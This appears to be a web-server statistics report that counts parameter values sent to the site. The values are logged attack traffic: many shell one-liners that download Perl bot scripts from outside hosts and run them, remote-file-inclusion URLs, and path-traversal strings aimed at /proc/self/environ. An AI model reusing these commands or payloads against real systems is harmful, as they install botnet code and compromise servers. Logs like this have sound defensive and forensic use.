http://h1.ripway.com/sur00t/testador.txt?/par 1
Parameter cmd
ValueAccesses
cd /tmp;wget http://www.freewebs.com/ferinha/ferinha.txt;cur
l -O -f http://www.freewebs.com/ferinha/ferinha.txt;lynx -so
urce http://www.freewebs.com/ferinha/ferinha.txt;lwp-rget ht
tp://www.freewebs.com/ferinha/ferinha.txt;fetch http://www.f
reewebs.com/ferinha/ferinha.txt;perl ferinha.txt;rm -rf feri
nha.txt
14
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
13
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt
12
cd /tmp;wget http://208.100.59.56/nanaozin.txt;curl -O -f ht
tp://208.100.59.56/nanaozin.txt;lynx -source http://208.100.
59.56/nanaozin.txt;lwp-rget http://208.100.59.56/nanaozin.tx
t;fetch http://208.100.59.56/nanaozin.txt;perl nanaozin.txt;
rm -rf nanaozin.txt
8
cd /tmp;wget http://www.freewebs.com/anaomenor/nanaozin.txt;
curl -O -f http://www.freewebs.com/anaomenor/nanaozin.txt;ly
nx -source http://www.freewebs.com/anaomenor/nanaozin.txt;lw
p-rget http://www.freewebs.com/anaomenor/nanaozin.txt;fetch
http://www.freewebs.com/anaomenor/nanaozin.txt;perl nanaozin
.txt;rm -rf nanaozin.txt
6
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch
http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16
2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn
x http://189.6.162.125:8090/x.txt;perl x.txt
5
uname -a; id 5
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3
.ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt
3
cd /tmp;wget http://206.71.148.89/ferita.txt;curl -O -f http
://206.71.148.89/ferita.txt;lynx -source http://206.71.148.8
9/ferita.txt;lwp-rget http://206.71.148.89/ferita.txt;fetch
http://206.71.148.89/ferita.txt;perl ferita.txt;rm -rf ferit
a.txt
3
id 3
Parameter s
ValueAccesses
r 2
OTHER: 673
ScriptTotal Accesses
/wusage/monthly/2007/06/01/cgi.html/components/com_galleria/
galleria.html.php
891
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www?????????????????????????????
40
http://www.gumgangfarm.com/shop/data/id.txt? 23
ftp://84.32.137.157/incoming/upload/trem/oldbisok?? 20
http://www.digitalcrocker.org/.1/safe3? 20
http://www.arooob.com/id.txt? 15
http://www.dunakom.hu/userimages/id.txt? 14
ftp://80.50.253.90/upload/trop/oldbis?? 14
http://trimedia-online.net/ihmank/id.txt?? 13
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?
?
12
http://www.vsm.gov.tr/pwnd/safe.gif? 10
OTHER: 710
ScriptTotal Accesses
/wusage/weekly/2011/02/27/ 882
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 14
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
111
../../../../../../../../../../../../../../../proc/self/envir
on
99
..//..//..//..//..//..//..//..///proc/self/environ 84
..//..//..//..//..//..//..//..///proc/self/environ 00 46
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
29
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
25
../../../../../../../../../../../../../../..//proc/self/envi
ron
9
../../../../../../../../../../..//proc/self/environ 00 7
../../../../../../../../../../../../..//proc/self/environ 00
4
..//..//..//..//..//..//..//..//..//..//..//..//..//..//../p
roc/self/environ
3
Parameter option
ValueAccesses
com_google 353
com_fabrik 41
com_rwcards 16
com_myblog 14
com_product 8
com_gcalendar 1
com_rokdownloads 1
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
6
../../../../../../../../../../../../../../../proc/self/envir
on
5
..//..//..//..//..//..//..//..///proc/self/environ 00 2
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
1
OTHER: 3
ScriptTotal Accesses
/wusage/weekly/2011/02/13/ 875
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 1
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 156
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
87
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
62
../../../../../../../../../../../../../../../proc/self/envir
on
43
../../../../../../../../../../../../../../..//proc/self/envi
ron
40
..//..//..//..//..//..//..//..///proc/self/environ 00 29
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
15
../../../../../../../../../../..//proc/self/environ 00 3
..//..//..//..//..//..//..//..//..//..//..//..//..//..//../p
roc/self/environ
1
Parameter option
ValueAccesses
com_google 369
com_rokdownloads 49
com_rwcards 10
com_fabrik 6
com_ccnewsletter 2
com_myblog 1
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
1
OTHER: 0
ScriptTotal Accesses
/wusage/monthly// 853
Parameters by Submitted Value
Parameter DOCUMENT_ROOT
ValueAccesses
http://www.seeum.co.kr/zero/zipcode/crespon1.txt? 6
http://www.lazar.ru/manager/processors/min.txt? 2
Parameter GLOBALS
ValueAccesses
44
Parameter INCLUDE_FOLDER
ValueAccesses
http://surihouse.co.kr/bbs/skin/sakk_k/fx29id1.txt? 2
http://photoworld.com.ua////zfxid1.txt?? 1
http://gumansin.com/id.txt?? 1
Parameter _PHPLIB[libdir]
ValueAccesses
http://sportsulsan.co.kr/poll/aipi/id.txt?? 4
http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CI
MG1122.jpg???
3
http://phamsight.com/docs/images/tail?? 3
http://telleriasnunez.com/id1.txt?? 3
http://sites.google.com/site/nurhayatisatu/1.txt??? 3
http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? 2
http://takesi.freewebhostx.com/fx29id1.txt?????? 2
http://www.sinhhocvietnam.com/data/1???? 2
http://www.cdtsomme.org//components/com_artforms/assets/capt
cha/includes/captchatalk/Oid1.txt???
2
http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? 2
Parameter _REQUEST
ValueAccesses
44
Parameter _REQUEST[Itemid]
ValueAccesses
1 44
Parameter _REQUEST[option]
ValueAccesses
com_frontpage 37
com_content 7
Parameter _SERVER[DOCUMENT_ROOT]
ValueAccesses
http://ucc.mygo.co.kr//data/session/su??? 6
http://www.gatheringcafe.com/administrator/components/com_ex
plore/heheh.txt? ?
5
http://www.therockcc.org/calendarevents/1.txt? 4
http://nhplm.org/_nersc1/plugins/tmp/respon1.txt??? 3
http://nic.bupt.edu.cn/media/id1.txt??? 3
http://www.shinchang.es.kr/board///su/id1.txt?? 2
http://shanghaisisa.com/skin/id1.txt?? 2
http://www.jejucc.net/_APP/lib/a??? 2
http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? 2
http://harvestusa.org///administrator//cache/id1.txt?? 2
Parameter _zb_parh
ValueAccesses
http://rainmaker.co.th/images/idxx.txt??? 4
Parameter _zb_path
ValueAccesses
http://www.whinercentral.com/modules/Neos_Chronos/modules/ma
war.txt??????
32
http://montaguekorea.com/AllplanPG/inicis//id1.txt??? 10
http://www.candidography.com/zero/id1.txt?? 8
http://www.bellasbar.co.za//templates_c/5.gif?? 8
http://www.kms75.or.kr/web/data/member/AK1??? 7
http://nic.bupt.edu.cn/media/j1.txt?? 7
http://kb27.co.kr/bbs///data/id1.txt?? 6
http://www.kq-china.com/web//plugins/system/id1.txt??? 5
http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?????
5
http://rainmaker.co.th/images/idxx.txt??? 4
OTHER: 512
ScriptTotal Accesses
/wusage/weekly/2010/10/31/ 844
Parameters by Submitted Value
Parameter Option
ValueAccesses
com_google 2
Parameter amp;view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 2
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 128
..//..//..//..//..//..//..//..///proc/self/environ 00 98
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
57
../../../../../../../../../../../../../../../proc/self/envir
on
46
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
39
../../../../../../../../../../../../../../..//proc/self/envi
ron
20
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
12
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
..//..//..//..//..//..//..//..//..///proc/self/environ 00
9
../../../../../../../../../../../../..//proc/self/environ 00
2
../../../../../../../../../..//proc/self/environ 2
Parameter index.php?option
ValueAccesses
com_google 2
Parameter option
ValueAccesses
com_google 414
com_fabrik 2
com_goole 2
Parameter view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 6
OTHER: 1
ScriptTotal Accesses
/wusage/weekly/2010/10/17/ 842
Parameters by Submitted Value
Parameter Option
ValueAccesses
com_google 3
Parameter amp;view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 4
Parameter controller
ValueAccesses
../../../../../../../../../../../../../../../proc/self/envir
on
144
..//..//..//..//..//..//..//..///proc/self/environ 98
..//..//..//..//..//..//..//..///proc/self/environ 00 65
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
29
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
20
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
19
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n 11
//..//..//..//..//..//..//..//..///proc/self/environ 00 8
../../../../../../../../../../../../../../..//proc/self/envi
ron
8
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
..//..//..//..//..//..//..//..//..///proc/self/environ 00
6
Parameter option
ValueAccesses
com_google 418
Parameter view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 6
OTHER: 3
ScriptTotal Accesses
/wusage/weekly/2011/03/06/ 836
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 28
125 4
Parameter amp;option
ValueAccesses
com_gcalendar 4
Parameter amp;view
ValueAccesses
gcalendar//?option=com_gcalendar 4
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
137
..//..//..//..//..//..//..//..///proc/self/environ 00 68
../../../../../../../../../../../../../../../proc/self/envir
on
44
..//..//..//..//..//..//..//..///proc/self/environ 34
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
27
../../../../../../../../../../..//proc/self/environ 00 24
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
12
../../../../../../../../../../../../../../..//proc/self/envi
ron
10
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ 00
3
..//..//..//..//..//..//..//..//..//..//..//..//proc/self/en
viron
2
Parameter option
ValueAccesses
com_google 301
com_fabrik 49
com_myblog 34
com_rwcards 6
com_goole 4
com_product 1
com_rokdownloads 1
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
23
..//..//..//..//..//..//..//..///proc/self/environ 00 8
../../../../../../../../../../../../../../../proc/self/envir
on
2
../../../../../../../../../../../../..//proc/self/environ 00
1
OTHER: 5
ScriptTotal Accesses
/wusage/weekly/2008/10/12/ 820
Parameters by Submitted Value
Parameter DOCUMENT_ROOT
ValueAccesses
http://vacancesgrandbornand.com/id1.php? 3
http://oursoultvxq.com/bbs/data/vip/id2.txt??? 3
http://korea-photo.com/bbs/data/id/test.html?? 1
Parameter INCLUDE_FOLDER
ValueAccesses
http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?
1
Parameter REX[INCLUDE_PATH]
ValueAccesses
http://www.desrem.ru/files/ec.txt? 5
http://125.163.251.219/har/fx29id1.txt?? 1
http://www.curling-erfurt.de/media/id1.txt?? 1
http://www.desrem.ru/files/ec.txt?? 1
Parameter _zb_path
ValueAccesses
http://www.ozin.co.kr/data/oil2.txt?? 4
http://www.2u264.com/bbs//include/id1.txt??? 2
http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id
1.txt??
2
http://www.j-vision.co.kr/company/hotel/index.php/bo.do?? 2
http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1
.txt??
2
http://www.adaiwa.com/car/images/uploads/bo.do?? 1
http://kostenerstattung.dr-rinner.de/upload/logos/fx29id.txt
??
1
http://cccgj.org/media/id.txt?? 1
http://www.2u264.com/bbs//include/id1.txt?? 1
Parameter custompluginfile
ValueAccesses
http://70.47.27.6/~autol/idv6.txt???? 1
Parameter custompluginfile[]
ValueAccesses
http://www.sh1908.org/bbs/data/st_wo7bor/fx29id1.txt?? 1
http://www.geocities.com/axenses/id.txt??? 1
http://sunandsea.co.kr/nalog/idku.txt???? 1
http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? 1
http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt
???
1
Parameter mosConfig_absolute_path
ValueAccesses
http://beautyengg.com/README?? 1
Parameter sIncPath
ValueAccesses
http://heatingfilm.com//kboard/data/bajo-id.txt??? 5
http://www.geocities.com/axenses/id.txt??? 3
http://www.nord-radio.com//votingpoll/sex.txt??? 2
http://www.eann.kr//idi.txt??? 2
http://cutor.cz/katalog/components/gefel.txt? 2
http://www.kiralyfa.hu/copyright?? 2
http://www.ozin.co.kr/data/oil2.txt?? 1
http://www.fraternidadsinaloense.com/foro/uiu.txt?? 1
Parameter shop_this_skin_path
ValueAccesses
http://mandlakaziestates.co.za/old/id.txt??? 1
Parameter sourcedir
ValueAccesses
http://gumansin.com/id.txt?? 24
https://www.ba-sat.com/sunshop/images/products/idfeel.txt?? 14
http://www.bissmyk.pl/vnc/fx29id.txt?? 11
http://www.gosgo.com/bbs/idr.txt?? 11
http://www.lazar.ru/manager/processors/copyright.txt??? 10
http://www.ppclub.co.kr/bbs/1.txt???? 9
http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt??
9
http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.t
xt??
8
http://www.irtt.ir/poll/image/id.jpg??? 8
http://www.actrade.hu/readme.txt?? 7
OTHER: 651
ScriptTotal Accesses
/wusage/summary/cgi.html/oneadmin/config.php 817
Parameters by Submitted Value
Parameter cmd
ValueAccesses
uname -a; id 5
id 4
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot
net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d
ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt
p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi
z.no-ip.info/botnet.txt;perl botnet.txt
4
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
4
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt
3
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
3
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
2
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm start.txt
1
cd /tmp;rm sta.txt;wget http://start.helloweb.eu/botnet/sta.
txt;fetch http://start.helloweb.eu/botnet/sta.txt;lwp-downlo
ad http://start.helloweb.eu/botnet/sta.txt;curl -O http://st
art.helloweb.eu/botnet/sta.txt;lynx http://start.helloweb.eu
/botnet/sta.txt;perl sta.txt;rm sta.txt
1
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc
raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/
pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap
s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p
emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t
xt;perl pemlk.txt;rm -rf pemlk*.txt
1
Parameter path[docroot
ValueAccesses
1
Parameter path[docroot]
ValueAccesses
http://invisionar.hostinggratisargentina.com/eth0? 31
http://www.jungo8949.co.kr/tool25.txt? 15
http://ownsparaficar.googlepages.com/funfo.txt? 14
http://usuarios.arnet.com.ar/larry123/exploit.txt? 14
http://usuarios.arnet.com.ar/larry123/safe.txt? 13
http://c4sh1234.100free.com/sc.gif? 13
http://dark4ngel.hostinggratisargentina.com/http? 12
http://usuarios.arnet.com.ar/adipasqua/http? 12
http://overowns.googlepages.com/testera.txt? 11
http://usuarios.arnet.com.ar/larry123/ka.txt? 10
Parameter path[docroot]http://callingplanetearth.org/g00d.zip?
ValueAccesses
1
Parameter path[docroot]http://callingplanetearth.org/sad.gif?
ValueAccesses
1
Parameter xroot
ValueAccesses
www.popcorn.de/cmd? 1
OTHER: 640
ScriptTotal Accesses
/wusage/summary/cgi.html/sohoadmin/program/modules/mods_full
/photo_album/includes/login.php
810
Parameters by Submitted Value
Parameter _SESSION[docroot_path]
ValueAccesses
http://invisionar.hostinggratisargentina.com/eth0? 42
http://usuarios.arnet.com.ar/larry123/exploit.txt? 18
http://usuarios.arnet.com.ar/adipasqua/http? 14
http://ownsparaficar.googlepages.com/funfo.txt? 14
http://dark4ngel.hostinggratisargentina.com/http? 12
http://normanzito.iespana.es/http.txt?? 11
http://overowns.googlepages.com/testera.txt? 11
http://overowns.googlepages.com/donottouch.txt? 10
http://211.236.244.133/~axlonaxlon/shell.txt? 10
http://usuarios.arnet.com.ar/larry123/ka.txt? 10
Parameter cmd
ValueAccesses
uname -a; id 14
id 9
cd /tmp/;wget tim.novoconteudo.com/oi.txt; perl oi.txt 1
cd /tmp/;wget tim.novoconteudo.com/oi.txt;curl -o oi.txt tim
.novoconteudo.com/oi.txt; perl oi.txt
1
Parameter oke
ValueAccesses
http://usuarios.arnet.com.ar/adipasqua/http? 15
http://usuarios.arnet.com.ar/larry123/exploit.txt? 14
http://dark4ngel.hostinggratisargentina.com/http? 12
http://usuarios.arnet.com.ar/larry123/ka.txt? 10
http://usuarios.arnet.com.ar/larry123/http? 9
http://82.195.129.64/~magnadon/shell.txt? 7
http://211.236.244.133/~axlonaxlon/shell.txt? 7
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 6
http://189.23.251.131/~tiago/new.txt? 6
http://www.zeyteen.net/aho.txt?? 6
Parameter xroot
ValueAccesses
www.popcorn.de/cmd? 2
OTHER: 539
ScriptTotal Accesses
/wusage/summary/cgi.html/admin/spaw/spaw_control.class.php 800
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
15
uname -a; id 9
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt;
fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee
p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t
xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf
*.txt
7
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot
net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d
ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt
p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi
z.no-ip.info/botnet.txt;perl botnet.txt
4
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
4
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
3
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm start.txt
3
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
3
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx
t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt
p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25
0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe
rl start.txt;rm start.txt
3
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt
2
Parameter spaw_root
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 31
http://usuarios.arnet.com.ar/larry123/safe.txt? 27
http://invisionar.hostinggratisargentina.com/eth0? 26
http://normanzito.iespana.es/http.txt?? 19
17
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 14
http://www.neoncomanda.kit.net/tool25.dat? 12
http://mwebhostx.com.br/x.txt? 10
http://usuarios.arnet.com.ar/larry123/ka.txt? 7
http://cornuletz.angelfire.com/c99in.txt? 7
Parameter spaw_roothttp://www.datapop.com.br/suporte//config.txt?
ValueAccesses
1
OTHER: 576
ScriptTotal Accesses
/wusage/summary/cgi.html//samplefaqsupport.php 796
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
12
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
7
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
7
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm start.txt
5
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt;
fetch http://SITE/bot.txt;lwp-download http://www.ownedson.1
10mb.com/bn.txt;curl -O http://www.ownedson.110mb.com/bn.txt
;lynx http://www.ownedson.110mb.com/bn.txt;perl bn.txt
5
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
5
cd /tmp;rm subale.txt;wget http://71.41.190.203/subale.txt;f
etch http://71.41.190.203/subale.txt;lwp-download http://71.
41.190.203/subale.txt;curl -O http://71.41.190.203/subale.tx
t;lynx http://71.41.190.203/subale.txt;perl subale.txt;rm -r
f *.txt
4
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.167.23:9090/s1t2
a3r4t.txt;fetch http://189.24.167.23:9090/s1t2a3r4t.txt;lwp-
download http://189.24.167.23:9090/s1t2a3r4t.txt;curl -O htt
p://189.24.167.23:9090/s1t2a3r4t.txt;lynx http://189.24.167.
23:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt
4
cd /tmp;rm bunda24.txt;wget http://www.octium.ru//language/b
unda24.txt;fetch http://www.octium.ru//language/bunda24.txt;
lwp-download http://www.octium.ru//language/bunda24.txt;curl
-O http://www.octium.ru//language/bunda24.txt;lynx http://w
ww.octium.ru//language/bunda24.txt;perl bunda24.txt;rm -rf *
.txt
4
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx
t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt
p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25
0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe
rl start.txt;rm start.txt
4
Parameter path[docroot]
ValueAccesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 39
http://usuarios.arnet.com.ar/larry123/ka.txt? 27
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 26
http://www.neoncomanda.kit.net/tool25.dat? 18
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? 17
http://www.jungo8949.co.kr/tool25.txt? 16
http://invisionar.hostinggratisargentina.com/eth0? 14
http://usuarios.arnet.com.ar/larry123/safe.txt? 14
http://www.santiagoonline.com.ar/readme.txt? 11
http://www.vsm.gov.tr/gorselbasin/docs/gorselbasin/aw128.txt
?
10
OTHER: 547
ScriptTotal Accesses
/wusage/summary/cgi.html/oneadmin/ecommerce/include.php 793
Parameters by Submitted Value
Parameter cmd
ValueAccesses
uname -a; id 7
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
3
id;uname -a 2
id 2
cd /tmp;wget http://vulnerable.we.bs/files/bb.txt;fetch http
://vulnerable.we.bs/files/bb.txt;lwp-download http://vulnera
ble.we.bs/files/bb.txt;curl -O http://vulnerable.we.bs/files
/bb.txt;lynx http://vulnerable.we.bs/files/bb.txt;perl bb.tx
t;rm -rf bb.txt
2
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch
http://malware.t35.com/tut.txt;lwp-download http://malware.
t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx
http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*
1
cd /tmp;wget http://h1.ripway.com/marley/tut.txt;perl tut.tx
t;rm tut.txt
1
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet
ch http://71.41.190.203/start.txt;lwp-download http://71.41.
190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn
x http://71.41.190.203/start.txt;perl start.txt;rm -rf start
.txt*
1
cd /tmp;wget http://www.mateus.t5.com.br/asdasd.txt;fetch ht
tp://www.mateus.t5.com.br/asdasd.txt;lwp-download http://www
.mateus.t5.com.br/asdasd.txt;curl -O http://www.mateus.t5.co
m.br/asdasd.txt;lynx http://www.mateus.t5.com.br/asdasd.txt;
perl asdasd.txt;rm -rf asdasd.txt
1
cd /tmp/;wget tim.novoconteudo.com/oi.txt; perl oi.txt 1
Parameter list
ValueAccesses
1 2
Parameter path[docroot]
ValueAccesses
http://ownsirc.googlepages.com/botnet.txt? 29
http://208.74.174.183/brizola.txt? 20
http://gikowns.googlepages.com/BOTNET-BRIZOLA.txt? 16
16
http://ownsparaficar.googlepages.com/funfo.txt? 14
http://www.elunacy.ca/ss.txt? 11
http://overowns.googlepages.com/testera.txt? 11
http://www.oslutadores.com/?id=23530 10
http://members.lycos.co.uk/fotosrome/botall.txt? 10
http://www.freewebs.com/sethz/php.txt? 10
OTHER: 623
ScriptTotal Accesses
/wusage/summary/cgi.html//components/com_performs/performs.p
hp
786
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
